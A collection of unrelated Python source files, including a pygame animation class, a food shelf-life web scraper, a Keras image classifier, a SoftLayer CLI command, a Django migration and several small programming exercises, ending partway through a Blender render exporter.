class DirAction:
"""
带方向的角色活动
"""
def __init__(self, path: str,
prefix: str, dir_count: int, image_count: int, is_loop: bool):
"""
角色行为
:param path: 路径
:param prefix: 文件名前缀
:param dir_count: 方向数量
:param image_count: 图片数量
:param is_loop: 是否循环显示
"""
self.image_index = 0
self.action_images = [] # type:[]
self.image_count = image_count
self.dir = 0
self.is_loop = is_loop
for j in range(0, dir_count):
dir_image = []
for i in range(0, image_count):
img_path = os.path.join('resource', 'img', path, prefix +
str.format("%02d" % j) + str.format("%03d" % i) + '.tga')
dir_image.append(pygame.image.load(img_path))
self.action_images.append(dir_image)
def get_current_image(self, dir: int) -> pygame.image:
"""
获取当前图片
:param dir: 获取的方向
:return:
"""
current_img = self.action_images[dir][self.image_index]
self.image_index += 1
if self.image_index + 1 >= self.image_count:
if self.is_loop:
self.image_index = 0
else:
self.image_index = self.image_count - 1
return current_img
def is_end(self) -> bool:
"""
活动是否结束
:return:
"""
if self.is_loop:
return False
else:
if self.image_index >= self.image_count - 1:
return True
else:
return False
def reset(self):
"""
重置活动
:return:
"""
self.image_index = 0
|
import requests
from bs4 import BeautifulSoup
from bs4 import Tag
from database import insert_general_table
counter = 0
def normalize_name(name):
if ' lasts' in name:
name = name.replace(' lasts', '')
if ' last' in name:
name = name.replace(' last', '')
if '(hard)*' in name:
name = name.replace('(hard)*', '')
return name
def get_unopened(raw):
val = None
if raw == '(Unopened/Opened)' or raw == '-':
val = None
elif "unopened" in raw.lower():
val = False
elif "opened" in raw.lower():
val = True
return val
# Date amount to days (ex: 1 Year -> 365 days)
def get_bound(normalized, units):
index = None
for i, c in enumerate(normalized):
if not c.isdigit():
index = i
break
return int(normalized[0:index]) * units[normalized[index:]]
# Returns lower bound, upper bound, unit type
def get_lower_and_upper_range(raw):
# Infinite amount of time
if raw == 'Indefinite':
return (99999, 99999, 'Days')
# Edge case: contains + in name (ex: 2+ Years -> 2 Years)
if '+' in raw:
raw = raw.replace('+', '')
# Edge case: unsure 'Cook First' means
if raw == 'Cook first':
return None
if '(' in raw:
raw = raw[0: raw.index('(')]
# Fix this case
if '--' in raw:
return None
if '-' == raw:
return None
# Contains several units of measurement
if "Year" in raw and "Months" in raw:
normalized = raw.replace(" ", "").lower()
units = {
"year": 365,
"years": 365,
"month": 30,
"months": 30
}
dash = normalized.index('-')
return (get_bound(normalized[0:dash], units), get_bound(normalized[dash + 1:], units), "Days")
if "date" in raw:
raw = ' '.join(raw.split()[0:2])
if raw == 'Same Day':
return (1, 1, 'Day')
elif '-' in raw:
index = raw.index('-')
return (int(raw[0:index]), int(raw[index + 1:index + 2]), raw[index + 3:].replace(" ", ""))
else:
index = raw.index(' ')
return (int(raw[0:index]), None, raw[index + 1:].replace(" ", ""))
def scrape_category_of_items(URL, category, subcategory):
r = requests.get(url=URL)
soup = BeautifulSoup(r.text)
for list in soup.find_all('div', {'class': 'arrow-list'}):
for li in filter(lambda x: type(x) is Tag, list.ul.contents):
name = li.a.contents[0]
url = li.a['href']
scrape_single_item_from_page(url, name, category, subcategory)
# Working for fruit pages
def scrape_single_item_from_page(URL, general_name, category, subcategory):
global counter
r = requests.get(url=URL)
soup = BeautifulSoup(r.text, "html.parser")
categories = []
items = []
possible_storages = ['Counter', 'Refrigerator', 'Freezer', 'Pantry', 'Shelf', 'Fridge']
for tr in filter(lambda x: type(x) is Tag, soup.select('div table')[0].tbody.children):
current_contents = list(filter(lambda x: type(x) is Tag, tr.contents))
if len(current_contents) == 0:
if len(tr.contents) != 0 and "opened" in str(tr.contents[0]).lower():
categories[0] = str(tr.contents[0])
continue
# Current row is an invalid header (Past printed date)
if len(current_contents[1].contents) != 0 and str(current_contents[1].contents[0]) == 'Past Printed Date':
continue
# Current row is a header (unopened, pantry, etc...) containing non-product info
if len(current_contents[1].contents) != 0 and str(current_contents[1].contents[0]) in possible_storages:
categories.clear()
for th in current_contents:
categories.extend(list(map(lambda x: str(x), th.contents)))
if len(current_contents[0].contents) == 0:
categories.insert(0, '-')
# Current row is a product row (item)
else:
if "Date" in current_contents[1].contents[0]:
continue
name = normalize_name(current_contents[0].contents[0].contents[0])
for i in range(1, len(categories)):
unopened = get_unopened(categories[0])
ranges = get_lower_and_upper_range(current_contents[i].contents[0])
if ranges is None:
print("Unable to add item " + name + " - " + categories[i] + " (range: " + current_contents[i].contents[0] + ")")
else:
item = (name, counter, category, subcategory, categories[i], unopened, ranges[0], ranges[1], ranges[2])
items.append(items)
insert_general_table(item)
print("Inserted: " + str(item))
counter += 1
if __name__ == '__main__':
scrape_single_item_from_page("https://www.eatbydate.com/fruits/fresh/tomatoes-shelf-life-expiration-date//", "Apples", "Fruits", "Fresh Fruits")
scrape_category_of_items("https://www.eatbydate.com/fruits/fresh/", "Fruits", "Fresh Fruits")
scrape_category_of_items("https://www.eatbydate.com/proteins/beans-peas/", "Proteins", "Beans & Peas")
scrape_single_item_from_page("https://www.eatbydate.com/proteins/meats/deli-meat-shelf-life-expiration-date/", "Deli Meat", "Proteins", "Deli Meat")
scrape_category_of_items("https://www.eatbydate.com/proteins/meats/", "Proteins", "Meats")
scrape_category_of_items("https://www.eatbydate.com/proteins/nuts/", "Proteins", "Nuts and Seeds")
scrape_category_of_items("https://www.eatbydate.com/proteins/poultry/", "Proteins", "Poultry")
scrape_category_of_items("https://www.eatbydate.com/proteins/poultry/", "Proteins", "Seafood")
print("Added a total of " + str(counter) + " items to the database") |
#!/bin/python3
import sys
def minimumAbsoluteDifference(n, arr):
arr.sort()
min_diff = abs(arr[0] - arr[1])
for i in range(2,n):
diff = abs(arr[i-1] - arr[i])
min_diff = min(min_diff, diff)
return min_diff
if __name__ == "__main__":
n = int(input().strip())
arr = list(map(int, input().strip().split(' ')))
result = minimumAbsoluteDifference(n, arr)
print(result)
|
import scaa
import numpy as np
import pytest
@pytest.fixture
def dims():
# Data (n, p); latent representation (n, d)
n = 50
p = 1000
d = 20
stoch_samples = 10
return n, p, d, stoch_samples
@pytest.fixture
def simulate():
return scaa.benchmark.simulate_pois(n=30, p=60, rank=1, eta_max=3)
@pytest.fixture
def simulate_holdout():
return scaa.benchmark.simulate_pois(n=200, p=300, rank=1, eta_max=3, holdout=.1)
@pytest.fixture
def simulate_train_test():
x, eta = scaa.benchmark.simulate_pois(n=200, p=300, rank=1, eta_max=3)
train, test = scaa.benchmark.train_test_split(x)
return train, test, eta
|
valor=float(input("coloque o valor dos jogos a serem comprado"))
quantidade=float(input("coloque a quantidade de jogos"))
frete=float(input("coloque o valor do frete"))
total=quantidade*valor+frete
print(total) |
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 14 09:03:47 2018
@author: Home
"""
from keras.models import Sequential
from keras.layers.core import Flatten, Dense, Dropout
from keras.layers.convolutional import Convolution2D, MaxPooling2D, ZeroPadding2D
from keras.optimizers import SGD
from keras.preprocessing.image import ImageDataGenerator
classifier = Sequential()
classifier.add(ZeroPadding2D((1,1),input_shape=(64,64,3)))
classifier.add(Convolution2D(64, (3, 3), activation="relu"))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(64, (3, 3), activation="relu"))
classifier.add(MaxPooling2D((2,2), strides=(2,2)))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(128, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(128, (3, 3), activation='relu'))
classifier.add(MaxPooling2D((2,2), strides=(2,2)))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(256, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(256, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(256, (3, 3), activation='relu'))
classifier.add(MaxPooling2D((2,2), strides=(2,2)))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(MaxPooling2D((2,2), strides=(2,2)))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(ZeroPadding2D((1,1)))
classifier.add(Convolution2D(512, (3, 3), activation='relu'))
classifier.add(MaxPooling2D((2,2), strides=(2,2)))
classifier.add(Flatten())
classifier.add(Dense(4096, activation='relu'))
classifier.add(Dropout(0.5))
classifier.add(Dense(4096, activation='relu'))
classifier.add(Dropout(0.5))
classifier.add(Dense(1, activation='sigmoid'))
sgd = SGD(lr=0.1, decay=1e-6, momentum=0.9, nesterov=True)
classifier.compile(optimizer=sgd, loss = 'binary_crossentropy', metrics = ['accuracy'])
train_datagen = ImageDataGenerator(
rescale=1./255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1./255)
training_set = train_datagen.flow_from_directory('Dataset/training_set',#input folder
target_size=(64, 64),
batch_size=32,
class_mode='binary')
test_set = test_datagen.flow_from_directory(
'Dataset/test_set', #path to test set
target_size=(64, 64),
batch_size=32,
class_mode='binary')
classifier.fit_generator(
training_set,
steps_per_epoch=1537, #insert number of images in training set
epochs=1,
validation_data=test_set,
validation_steps=len(test_set)//32) #insert number of images in test set
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
from setuptools import setup
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst')) as f:
long_description = f.read()
setup(
name='ckip-segmenter',
version='1.0.2',
description='Ckip Segmenter',
long_description=long_description,
url='https://github.com/henryyang42/ckip-segmenter',
author='henryyang42',
author_email='henryyang42@gmail.com',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: Chinese (Traditional)',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Text Processing',
'Topic :: Text Processing :: Indexing',
'Topic :: Text Processing :: Linguistic'
],
python_requires='>=3',
keywords='NLP,tokenizing,Chinese word segementation,part-of-speech tagging',
py_modules=["ckip"],
)
|
"""Get details for a hardware device."""
# :license: MIT, see LICENSE for more details.
import click
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import formatting
from SoftLayer.CLI import helpers
from SoftLayer import utils
@click.command()
@click.argument('identifier')
@click.option('--passwords', is_flag=True, help='Show passwords (check over your shoulder!)')
@click.option('--price', is_flag=True, help='Show associated prices')
@environment.pass_env
def cli(env, identifier, passwords, price):
"""Get details for a hardware device."""
hardware = SoftLayer.HardwareManager(env.client)
table = formatting.KeyValueTable(['name', 'value'])
table.align['name'] = 'r'
table.align['value'] = 'l'
hardware_id = helpers.resolve_id(hardware.resolve_ids, identifier, 'hardware')
result = hardware.get_hardware(hardware_id)
result = utils.NestedDict(result)
hard_drives = hardware.get_hard_drives(hardware_id)
operating_system = utils.lookup(result, 'operatingSystem', 'softwareLicense', 'softwareDescription') or {}
memory = formatting.gb(result.get('memoryCapacity', 0))
owner = None
if utils.lookup(result, 'billingItem') != []:
owner = utils.lookup(result, 'billingItem', 'orderItem', 'order', 'userRecord', 'username')
table_hard_drives = formatting.Table(['Name', 'Capacity', 'Serial #'])
for drives in hard_drives:
name = drives['hardwareComponentModel']['manufacturer'] + " " + drives['hardwareComponentModel']['name']
capacity = str(drives['hardwareComponentModel']['hardwareGenericComponentModel']['capacity']) + " " + str(
drives['hardwareComponentModel']['hardwareGenericComponentModel']['units'])
serial = drives['serialNumber']
table_hard_drives.add_row([name, capacity, serial])
table.add_row(['id', result['id']])
table.add_row(['guid', result['globalIdentifier'] or formatting.blank()])
table.add_row(['hostname', result['hostname']])
table.add_row(['domain', result['domain']])
table.add_row(['fqdn', result['fullyQualifiedDomainName']])
table.add_row(['status', result['hardwareStatus']['status']])
table.add_row(['datacenter', result['datacenter']['name'] or formatting.blank()])
table.add_row(['cores', result['processorPhysicalCoreAmount']])
table.add_row(['memory', memory])
table.add_row(['drives', table_hard_drives])
table.add_row(['public_ip', result['primaryIpAddress'] or formatting.blank()])
table.add_row(['private_ip', result['primaryBackendIpAddress'] or formatting.blank()])
table.add_row(['ipmi_ip', result['networkManagementIpAddress'] or formatting.blank()])
table.add_row(['os', operating_system.get('name') or formatting.blank()])
table.add_row(['os_version', operating_system.get('version') or formatting.blank()])
table.add_row(['created', result['provisionDate'] or formatting.blank()])
table.add_row(['owner', owner or formatting.blank()])
vlan_table = formatting.Table(['type', 'number', 'id'])
for vlan in result['networkVlans']:
vlan_table.add_row([vlan['networkSpace'], vlan['vlanNumber'], vlan['id']])
table.add_row(['vlans', vlan_table])
bandwidth = hardware.get_bandwidth_allocation(hardware_id)
bw_table = _bw_table(bandwidth)
table.add_row(['Bandwidth', bw_table])
if result.get('notes'):
table.add_row(['notes', result['notes']])
if price:
total_price = utils.lookup(result, 'billingItem', 'nextInvoiceTotalRecurringAmount') or 0
price_table = formatting.Table(['Item', 'Recurring Price'])
price_table.add_row(['Total', total_price])
for item in utils.lookup(result, 'billingItem', 'children') or []:
price_table.add_row([item['description'], item['nextInvoiceTotalRecurringAmount']])
table.add_row(['prices', price_table])
if passwords:
pass_table = formatting.Table(['username', 'password'])
for item in result['operatingSystem']['passwords']:
pass_table.add_row([item['username'], item['password']])
table.add_row(['users', pass_table])
pass_table = formatting.Table(['ipmi_username', 'password'])
for item in result['remoteManagementAccounts']:
pass_table.add_row([item['username'], item['password']])
table.add_row(['remote users', pass_table])
table.add_row(['tags', formatting.tags(result['tagReferences'])])
env.fout(table)
def _bw_table(bw_data):
"""Generates a bandwidth usage table"""
table = formatting.Table(['Type', 'In GB', 'Out GB', 'Allotment'])
for bw_point in bw_data.get('usage'):
bw_type = 'Private'
allotment = 'N/A'
if bw_point['type']['alias'] == 'PUBLIC_SERVER_BW':
bw_type = 'Public'
if not bw_data.get('allotment'):
allotment = '-'
else:
allotment = utils.lookup(bw_data, 'allotment', 'amount')
table.add_row([bw_type, bw_point['amountIn'], bw_point['amountOut'], allotment])
return table
|
import sys
from contextlib import contextmanager
from types import TracebackType
from typing import Any, Callable, Generator, Optional, Type
from PyQt5 import QtWidgets
from qt_material import apply_stylesheet
from nitrokeyapp import get_theme_path
from nitrokeyapp.gui import GUI
from nitrokeyapp.logger import init_logging, log_environment
@contextmanager
def exception_handler(
hook: Callable[[Type[BaseException], BaseException, Optional[TracebackType]], Any],
) -> Generator[None, None, None]:
old_hook = sys.excepthook
sys.excepthook = hook
try:
yield
finally:
sys.excepthook = old_hook
def main() -> None:
app = QtWidgets.QApplication(sys.argv)
# set default material stylesheet if no system theme is set
if not app.style().objectName() or app.style().objectName() == "fusion":
apply_stylesheet(app, theme=get_theme_path())
with init_logging() as log_file:
log_environment()
window = GUI(app, log_file)
with exception_handler(window.trigger_handle_exception.emit):
app.exec()
if __name__ == "__main__":
main()
|
import sys
from collections import deque
# 입력 받기
n = int(sys.stdin.readline())
m = int(sys.stdin.readline())
# 결혼식에 초대할 사람 목록
answer = []
# 친구 관계 그래프 생성
friends = [[] for _ in range(n+1)]
for _ in range(m):
a, b = map(int, sys.stdin.readline().split())
friends[a].append(b)
friends[b].append(a)
# BFS
def bfs(v):
answer.append(v) # 결혼식에 초대 할 사람으로 추가
queue = deque(friends[v])
while queue:
c = queue.popleft()
answer.append(c) # 내 친구 추가
# 친구의 친구 추가
for p in friends[c]:
if p not in answer and p not in queue:
answer.append(p)
# 결혼식에 초대할 사람 찾기
bfs(1)
# 정답 출력
print(len(answer)-1) # 본인 제외 |
# Generated by Django 2.2.4 on 2019-08-16 15:27
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
import phonenumber_field.modelfields
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CleanPanelist',
fields=[
('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
('year', models.IntegerField()),
('season', models.IntegerField(choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')])),
('district', models.CharField(max_length=255)),
('convention', models.CharField(max_length=255)),
('session', models.IntegerField(choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')])),
('round', models.IntegerField(choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')])),
('category', models.IntegerField(choices=[(30, 'Music'), (40, 'Performance'), (50, 'Singing')])),
('num', models.IntegerField()),
('legacy_person', models.CharField(max_length=255)),
('scores', django.contrib.postgres.fields.jsonb.JSONField()),
('panelist_id', models.UUIDField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='CleanSong',
fields=[
('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
('year', models.IntegerField()),
('season', models.IntegerField(choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')])),
('district', models.CharField(max_length=255)),
('convention', models.CharField(max_length=255)),
('session', models.IntegerField(choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')])),
('round', models.IntegerField(choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')])),
('appearance_num', models.IntegerField()),
('song_num', models.IntegerField()),
('legacy_group', models.CharField(max_length=255)),
('legacy_chart', models.CharField(max_length=255)),
('scores', django.contrib.postgres.fields.jsonb.JSONField()),
('appearance_id', models.UUIDField(blank=True, null=True)),
('song_id', models.UUIDField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Complete',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('row_id', models.IntegerField(blank=True, null=True)),
('year', models.IntegerField(blank=True, null=True)),
('season_kind', models.IntegerField(blank=True, choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')], null=True)),
('district_code', models.CharField(blank=True, max_length=255)),
('convention_name', models.CharField(blank=True, max_length=255)),
('session_kind', models.IntegerField(blank=True, choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')], null=True)),
('round_kind', models.IntegerField(blank=True, choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')], null=True)),
('category_kind', models.IntegerField(blank=True, choices=[(30, 'Music'), (40, 'Performance'), (50, 'Singing')], null=True)),
('points', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(blank=True, null=True), blank=True, null=True, size=None)),
('person_id', models.UUIDField(blank=True, null=True)),
('panelist_id', models.UUIDField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Group',
fields=[
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.CharField(default='UNKNOWN', help_text='\n The name of the resource.\n ', max_length=255)),
('kind', models.IntegerField(choices=[('International', [(1, 'International')]), ('District', [(11, 'District'), (12, 'Noncompetitive'), (13, 'Affiliate')]), ('Chapter', [(30, 'Chapter')]), ('Group', [(32, 'Chorus'), (41, 'Quartet'), (46, 'VLQ')])], help_text='\n The kind of group.\n ')),
('gender', models.IntegerField(choices=[(10, 'Male'), (20, 'Female'), (30, 'Mixed')], default=10, help_text='\n The gender of group.\n ')),
('division', models.IntegerField(blank=True, choices=[('EVG', [(10, 'EVG Division I'), (20, 'EVG Division II'), (30, 'EVG Division III'), (40, 'EVG Division IV'), (50, 'EVG Division V')]), ('FWD', [(60, 'FWD Arizona'), (70, 'FWD Northeast'), (80, 'FWD Northwest'), (90, 'FWD Southeast'), (100, 'FWD Southwest')]), ('LOL', [(110, 'LOL 10000 Lakes'), (120, 'LOL Division One'), (130, 'LOL Northern Plains'), (140, 'LOL Packerland'), (150, 'LOL Southwest')]), ('MAD', [(170, 'MAD Central'), (180, 'MAD Northern'), (190, 'MAD Southern')]), ('NED', [(210, 'NED Granite and Pine'), (220, 'NED Mountain'), (230, 'NED Patriot'), (240, 'NED Sunrise'), (250, 'NED Yankee')]), ('SWD', [(260, 'SWD Northeast'), (270, 'SWD Northwest'), (280, 'SWD Southeast'), (290, 'SWD Southwest')])], null=True)),
('bhs_id', models.IntegerField(blank=True, null=True, unique=True)),
('code', models.CharField(blank=True, help_text='\n Short-form code.', max_length=255)),
('website', models.URLField(blank=True, default='', help_text='\n The website URL of the resource.')),
('email', models.EmailField(blank=True, help_text='\n The contact email of the resource.', max_length=254, null=True)),
('phone', models.CharField(blank=True, help_text='\n The phone number of the resource. Include country code.', max_length=25)),
('fax_phone', models.CharField(blank=True, help_text='\n The fax number of the resource. Include country code.', max_length=25)),
('start_date', models.DateField(blank=True, null=True)),
('end_date', models.DateField(blank=True, null=True)),
('location', models.CharField(blank=True, help_text='\n The geographical location of the resource.', max_length=255)),
('facebook', models.URLField(blank=True, help_text='\n The facebook URL of the resource.')),
('twitter', models.URLField(blank=True, help_text='\n The twitter URL of the resource.')),
('youtube', models.URLField(blank=True, default='', help_text='\n The youtube URL of the resource.')),
('pinterest', models.URLField(blank=True, default='', help_text='\n The pinterest URL of the resource.')),
('flickr', models.URLField(blank=True, default='', help_text='\n The flickr URL of the resource.')),
('instagram', models.URLField(blank=True, default='', help_text='\n The instagram URL of the resource.')),
('soundcloud', models.URLField(blank=True, default='', help_text='\n The soundcloud URL of the resource.')),
('image', models.URLField(blank=True, default='', max_length=255)),
('description', models.TextField(blank=True, help_text='\n A description of the group. Max 1000 characters.', max_length=1000)),
('participants', models.CharField(blank=True, default='', help_text='Director(s) or Members (listed TLBB)', max_length=255)),
('notes', models.TextField(blank=True, help_text='\n Notes (for internal use only).')),
('international', models.TextField(blank=True, help_text='\n The denormalized international group.', max_length=255)),
('district', models.TextField(blank=True, help_text='\n The denormalized district group.', max_length=255)),
('chapter', models.TextField(blank=True, help_text='\n The denormalized chapter group.', max_length=255)),
],
options={
'verbose_name_plural': 'Groups',
},
),
migrations.CreateModel(
name='Person',
fields=[
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('status', models.IntegerField(choices=[(-10, 'Inactive'), (0, 'New'), (10, 'Active')], default=10, help_text='DO NOT CHANGE MANUALLY unless correcting a mistake. Use the buttons to change state.')),
('prefix', models.CharField(blank=True, default='', help_text='\n The prefix of the person.', max_length=255)),
('first_name', models.CharField(editable=False, help_text='\n The first name of the person.', max_length=255)),
('middle_name', models.CharField(editable=False, help_text='\n The middle name of the person.', max_length=255)),
('last_name', models.CharField(editable=False, help_text='\n The last name of the person.', max_length=255)),
('nick_name', models.CharField(editable=False, help_text='\n The nickname of the person.', max_length=255)),
('suffix', models.CharField(blank=True, default='', help_text='\n The suffix of the person.', max_length=255)),
('birth_date', models.DateField(editable=False, null=True)),
('spouse', models.CharField(blank=True, default='', max_length=255)),
('location', models.CharField(blank=True, default='', help_text='\n The geographical location of the resource.', max_length=255)),
('part', models.IntegerField(choices=[(1, 'Tenor'), (2, 'Lead'), (3, 'Baritone'), (4, 'Bass')], editable=False, null=True)),
('mon', models.IntegerField(editable=False, help_text='\n Men of Note.', null=True)),
('gender', models.IntegerField(choices=[(10, 'Male'), (20, 'Female')], editable=False, null=True)),
('district', models.CharField(blank=True, default='', help_text='\n District (used primarily for judges.)', max_length=10)),
('is_deceased', models.BooleanField(default=False, editable=False)),
('is_honorary', models.BooleanField(default=False, editable=False)),
('is_suspended', models.BooleanField(default=False, editable=False)),
('is_expelled', models.BooleanField(default=False, editable=False)),
('website', models.URLField(blank=True, default='', help_text='\n The website URL of the resource.')),
('email', models.EmailField(editable=False, help_text='\n The contact email of the resource.', max_length=254, null=True)),
('address', models.TextField(blank=True, default='', help_text='\n The complete address of the resource.', max_length=1000)),
('home_phone', phonenumber_field.modelfields.PhoneNumberField(editable=False, help_text='\n The home phone number of the resource. Include country code.', max_length=128, region=None)),
('work_phone', phonenumber_field.modelfields.PhoneNumberField(editable=False, help_text='\n The work phone number of the resource. Include country code.', max_length=128, region=None)),
('cell_phone', phonenumber_field.modelfields.PhoneNumberField(editable=False, help_text='\n The cell phone number of the resource. Include country code.', max_length=128, region=None)),
('airports', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(blank=True, max_length=3), blank=True, null=True, size=None)),
('image', models.URLField(blank=True, max_length=255)),
('description', models.TextField(blank=True, default='', help_text='\n A bio of the person. Max 1000 characters.', max_length=1000)),
('notes', models.TextField(blank=True, default='', help_text='\n Notes (for internal use only).')),
('bhs_id', models.IntegerField(editable=False)),
('mc_pk', models.CharField(blank=True, db_index=True, max_length=36, null=True, unique=True)),
],
options={
'verbose_name_plural': 'Persons',
},
),
migrations.CreateModel(
name='RawPanelist',
fields=[
('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
('year', models.IntegerField()),
('season', models.CharField(max_length=255)),
('district', models.CharField(max_length=255)),
('convention', models.CharField(max_length=255)),
('session', models.CharField(max_length=255)),
('round', models.CharField(max_length=255)),
('category', models.CharField(max_length=255)),
('num', models.IntegerField(blank=True, null=True)),
('judge', models.CharField(max_length=255)),
('scores', django.contrib.postgres.fields.jsonb.JSONField()),
],
),
migrations.CreateModel(
name='RawSong',
fields=[
('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
('season', models.CharField(max_length=255)),
('year', models.IntegerField()),
('district', models.CharField(max_length=255)),
('event', models.CharField(max_length=255)),
('session', models.CharField(max_length=255)),
('group_name', models.CharField(max_length=255)),
('appearance_num', models.IntegerField()),
('song_num', models.IntegerField()),
('song_title', models.CharField(max_length=255)),
('totals', models.IntegerField()),
('scores', django.contrib.postgres.fields.jsonb.JSONField()),
],
),
migrations.CreateModel(
name='Selection',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('mark', models.BooleanField(default=False)),
('row_id', models.IntegerField(blank=True, null=True)),
('year', models.IntegerField(blank=True, null=True)),
('season_kind', models.IntegerField(blank=True, choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')], null=True)),
('district_code', models.CharField(blank=True, max_length=255)),
('convention_name', models.CharField(blank=True, max_length=255)),
('session_kind', models.IntegerField(blank=True, choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')], null=True)),
('round_kind', models.IntegerField(blank=True, choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')], null=True)),
('group_name', models.CharField(blank=True, max_length=255)),
('appearance_num', models.IntegerField(blank=True, null=True)),
('song_num', models.IntegerField(blank=True, null=True)),
('song_title', models.CharField(blank=True, max_length=255)),
('totals', models.IntegerField(blank=True, null=True)),
('points', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(blank=True, null=True), blank=True, null=True, size=None)),
('song_id', models.UUIDField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Flat',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('score_id', models.UUIDField(blank=True, null=True)),
('complete', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='flats', to='keller.Complete')),
('selection', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='flats', to='keller.Selection')),
],
options={
'unique_together': {('complete', 'selection', 'score_id')},
},
),
migrations.CreateModel(
name='CleanFlat',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('points', models.IntegerField()),
('score_id', models.UUIDField(blank=True, null=True)),
('cleanpanelist', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cleanflats', to='keller.CleanPanelist')),
('cleansong', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cleanflats', to='keller.CleanSong')),
],
options={
'unique_together': {('cleanpanelist', 'cleansong')},
},
),
]
|
import bpy
from io_export_blend_to_renderer import pbrt
from bpy.types import NodeTree, Node, NodeSocket
import nodeitems_utils
from nodeitems_utils import NodeCategory, NodeItem, NodeItemCustom
import shutil
import os
# Node sockets
def Pbrt_SocketRGBA(socket):
value = socket.default_value
return "\"rgb "+ socket.name + "\" ["+ str(value[0]) + " " + str(value[1]) + " " + str(value[2]) +"]"
def Pbrt_SocketINT(socket):
return "\"integer "+ socket.name + "\" "+ str(socket.default_value)
def Pbrt_SocketBOOL(socket):
return "\"bool "+ socket.name + "\" "+ str(socket.default_value)
def Pbrt_SocketVALUE(socket):
return "\"float "+ socket.name + "\" "+ str(socket.default_value)
def Pbrt_SocketSHADER(socket,data):
if len(socket.links) > 0:
node = socket.links[0].from_node
if isinstance(node, PbrtMaterialNode):
data.append(Pbrt_ExistingExportMaterial(node, "material."+ str(len(data)), data))
